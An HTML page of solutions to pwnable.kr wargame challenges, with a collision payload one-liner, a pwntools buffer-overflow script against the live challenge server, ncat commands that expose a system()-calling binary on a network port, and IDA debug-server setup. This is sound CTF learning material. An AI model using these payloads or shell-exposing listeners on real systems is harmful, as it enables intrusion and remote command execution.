< div id = "content" class = "content" >
< main >
< h1 id = "solutions-for-pwnablekr" > < a class = "header" href = "#solutions-for-pwnablekr" > Solutions for pwnable.kr< / a > < / h1 >
< h2 id = "toddlers-bottle" > < a class = "header" href = "#toddlers-bottle" > [Toddler’ s Bottle]< / a > < / h2 >
< h3 id = "fd" > < a class = "header" href = "#fd" > fd< / a > < / h3 >
< pre > < code > ssh fd@pwnable.kr -p2222
(pw:guest)
0x1234 = 4660, so pass 4660 as the argument; the program then waits for input on stdin:
./fd 4660
LETMEWIN
# typing LETMEWIN on stdin prints the flag
< / code > < / pre >
< h3 id = "collision" > < a class = "header" href = "#collision" > collision< / a > < / h3 >
< pre > < code class = "language-sh" > ssh col@pwnable.kr -p2222
(pw:guest)
file ./col
# file reports a 32-bit LSB (little-endian) ELF, so every multi-byte value in the payload must be written least-significant byte first
< / code > < / pre >
< p > Big-endian:
In big-endian systems, the most significant byte (MSB) is stored at the lowest memory address, followed by the less significant bytes. For example, the 32-bit integer 0x12345678 would be stored as 12 34 56 78 in memory.< / p >
< p > Little-endian:
In little-endian systems, the least significant byte (LSB) is stored at the lowest memory address, followed by the more significant bytes. For the same 32-bit integer 0x12345678, it would be stored as 78 56 34 12 in memory.< / p >
< pre > < code class = "language-sh" > 0x21DD09EC => 568134124
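# Target value (from the binary): 0x21DD09EC = 568134124.
# The 20-byte argument is presumably summed as five little-endian 32-bit words
# (the arithmetic below assumes that). No byte may be 0x00, because argv strings
# are NUL-terminated, so the smallest usable word is 0x01010101; use it four times.
# 0x01010101 * 4 = 0x04040404 = 67372036
# 568134124 - 67372036 = 500762088 = 0x1DD905E8   (the fifth word)
# Little-endian in memory: e8 05 d9 1d.
# Needs Python 2: its print writes the \x.. escapes as raw bytes. Python 3's
# print() would UTF-8-encode \xe8 and \xd9 into two bytes each and break the sum;
# on Python 3 use: python3 -c 'import sys; sys.stdout.buffer.write(b"\x01"*16+b"\xe8\x05\xd9\x1d")'
./col "$(python -c 'print("\x01"*16+"\xe8\x05\xd9\x1d")')"
# can get the flag
# Unrelated to collision: serve a locally built binary on TCP 4444 for exploit
# testing (same as in the bof section). Anyone who can reach that port talks to it.
ncat -vc ./a.out -kl 192.168.64.6 4444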
< / code > < / pre >
< h3 id = "bof" > < a class = "header" href = "#bof" > bof< / a > < / h3 >
< pre > < code > Download : http://pwnable.kr/bin/bof
Download : http://pwnable.kr/bin/bof.c
Running at : nc pwnable.kr 9000
# Serve a local copy for testing: -l listen, -k keep listening after a client
# disconnects, -c pipe each connection into ./bof, -v verbose. Because bof calls
# system() once the key check passes, anyone who can reach 192.168.64.6:4444 gets
# a shell as you — bind to 127.0.0.1 or a host-only interface instead.
ncat -vc ./bof -kl 192.168.64.6 4444
< / code > < / pre >
< pre > < code class = "language-sh" > gef➤ checksec
[+] checksec for '/home/ubuntu22/code/pwn/pwnable_kr_challenge/bof/bof'
Canary : ✓
NX : ✓
PIE : ✓
Fortify : ✘
RelRO : Full
# NOTE: this is a local x86-64 rebuild of bof.c (see the path above), not the
# binary served on pwnable.kr:9000. It has a canary, PIE and NX, and keeps
# `key` at [rbp-0x34] — below the buffer at [rbp-0x2c] — so an overflow of this
# build cannot reach it; the 0x34 offset in the exploit script below is for the
# remote binary, which the script treats as 32-bit.
gef➤ disassemble func
Dump of assembler code for function func:
0x00005555555551c9 < +0> : endbr64
0x00005555555551cd < +4> : push rbp
0x00005555555551ce < +5> : mov rbp,rsp
0x00005555555551d1 < +8> : sub rsp,0x40
0x00005555555551d5 < +12> : mov DWORD PTR [rbp-0x34],edi
0x00005555555551d8 < +15> : mov rax,QWORD PTR fs:0x28
0x00005555555551e1 < +24> : mov QWORD PTR [rbp-0x8],rax
0x00005555555551e5 < +28> : xor eax,eax
0x00005555555551e7 < +30> : lea rax,[rip+0xe16] # 0x555555556004
0x00005555555551ee < +37> : mov rdi,rax
0x00005555555551f1 < +40> : mov eax,0x0
0x00005555555551f6 < +45> : call 0x5555555550c0 < printf@plt>
0x00005555555551fb < +50> : lea rax,[rbp-0x2c]
0x00005555555551ff < +54> : mov rdi,rax
0x0000555555555202 < +57> : mov eax,0x0
0x0000555555555207 < +62> : call 0x5555555550d0 < gets@plt>
0x000055555555520c < +67> : cmp DWORD PTR [rbp-0x34],0xcafebabe
0x0000555555555213 < +74> : jne 0x555555555226 < func+93>
0x0000555555555215 < +76> : lea rax,[rip+0xdf7] # 0x555555556013
0x000055555555521c < +83> : mov rdi,rax
0x000055555555521f < +86> : call 0x5555555550b0 < system@plt>
0x0000555555555224 < +91> : jmp 0x555555555235 < func+108>
0x0000555555555226 < +93> : lea rax,[rip+0xdee] # 0x55555555601b
0x000055555555522d < +100> : mov rdi,rax
0x0000555555555230 < +103> : call 0x555555555090 < puts@plt>
0x0000555555555235 < +108> : nop
0x0000555555555236 < +109> : mov rax,QWORD PTR [rbp-0x8]
0x000055555555523a < +113> : sub rax,QWORD PTR fs:0x28
0x0000555555555243 < +122> : je 0x55555555524a < func+129>
0x0000555555555245 < +124> : call 0x5555555550a0 < __stack_chk_fail@plt>
0x000055555555524a < +129> : leave
0x000055555555524b < +130> : ret
End of assembler dump.
< / code > < / pre >
< pre > < code class = "language-python" > from pwn import *
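# Target: the challenge binary on pwnable.kr:9000, which this script treats as
# 32-bit (p32). It is NOT the local x86-64 PIE/canary rebuild disassembled above;
# that build keeps `key` at [rbp-0x34], below the buffer, so its layout differs.
p = remote('pwnable.kr', 9000)
# Payload: 0x2c bytes fill the buffer, then presumably 4 bytes of saved frame
# pointer and 4 bytes of return address, and the next 4 bytes land on func()'s
# `key`, which the binary compares with 0xcafebabe before calling system().
# Build it as bytes: on Python 3, str(p32(...)) yields the text "b'\\xbe...'"
# instead of the four raw bytes, and 'a' * n + bytes raises TypeError.
buf = b'a' * 0x2c        # buffer
buf += b'b' * 4          # saved frame pointer (value irrelevant)
buf += b'c' * 4          # return address (value irrelevant)
buf += p32(0xcafebabe)   # key, little-endian
p.sendline(buf)
p.interactive()          # interact with whatever system() spawns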
< / code > < / pre >
< h3 id = "gcc-compile-flags" > < a class = "header" href = "#gcc-compile-flags" > gcc compile flags< / a > < / h3 >
< div class = "table-wrapper" > < table > < thead > < tr > < th > item< / th > < th > opt< / th > < th > descript< / th > < / tr > < / thead > < tbody >
<tr><td>NX (DEP)</td><td>-z execstack // disable NX; -z noexecstack // enable NX</td><td>Non-executable stack: stack pages cannot be executed</td></tr>
<tr><td>RELRO</td><td>-z norelro // off; -z lazy // partial (RELRO with lazy binding, the usual default); -z now // full</td><td>GOT write protection; only Full RELRO makes the GOT itself read-only</td></tr>
<tr><td>PIE (ASLR)</td><td>-no-pie // off; -fpie -pie or -fPIE -pie // on. The lower-/upper-case forms differ in code generation (GOT size limits), not in protection strength; checksec reports PIE either way</td><td>Code and data segment base randomized by the kernel's ASLR</td></tr>
<tr><td>CANARY</td><td>-fno-stack-protector // off; -fstack-protector // functions with local char buffers; -fstack-protector-strong // broader; -fstack-protector-all // every function</td><td>Stack-smashing canary checked before return</td></tr>
<tr><td>FORTIFY</td><td>-D_FORTIFY_SOURCE=1 // weaker checks; -D_FORTIFY_SOURCE=2 // stronger checks (requires -O1 or higher to have any effect)</td><td>Bounds-checked replacements for common libc functions</td></tr>
< / tbody > < / table >
< / div >
< hr / >
< pre > < code > # CANARY : disabled => -fno-stack-protector
# FORTIFY : disabled (_FORTIFY_SOURCE is only active together with -O1 or higher)
# NX      : disabled => -z execstack
# PIE     : disabled => -no-pie
# Build a 32-bit, non-PIE target with no canary and an executable stack.
gcc -m32 -no-pie -fno-stack-protector -z execstack -o rop rop.c
< / code > < / pre >
< h3 id = "ida-remote-debug" > < a class = "header" href = "#ida-remote-debug" > ida remote debug< / a > < / h3 >
< pre > < code class = "language-sh" > mkdir ~/pwn
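cd ~/pwn
# These debug servers come from a third-party mirror, not from your IDA
# install. Prefer the copies in IDA's own dbgsrv/ directory so the server
# matches your IDA version; if you use the mirror, verify the files against
# those first — you are about to run them on your box.
wget https://gitcode.net/dnrops/ida_dbgsrv/-/raw/main/linux_server
wget https://gitcode.net/dnrops/ida_dbgsrv/-/raw/main/linux_server64
# Executable bit only. chmod 777 would make the servers world-writable, so any
# other local user could swap in a binary that you then run as yourself.
chmod u+x ./linux_server ./linux_server64
# Append to ~/.bashrc. Use $HOME rather than a quoted "~": tilde is not
# expanded inside double quotes, so "~/pwn/:$PATH" adds a literal ~/pwn/
# entry that PATH lookup never resolves.
echo 'export PATH="$HOME/pwn:$PATH"' >> ~/.bashrc
source ~/.bashrc
# Address of the interface the IDA host can reach (ip addr works too).
ifconfig
192.168.64.6
# The server executes whatever the connected IDA asks, with your privileges,
# and with no password it accepts any client. Bind it to a host-only or lab
# interface and set a password (-P<password>; check linux_server64 -h for the
# exact spelling in your version).
linux_server64 -i 192.168.64.6 -p 23230
# connect from IDA to 192.168.64.6:23230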
< / code > < / pre >
< / main >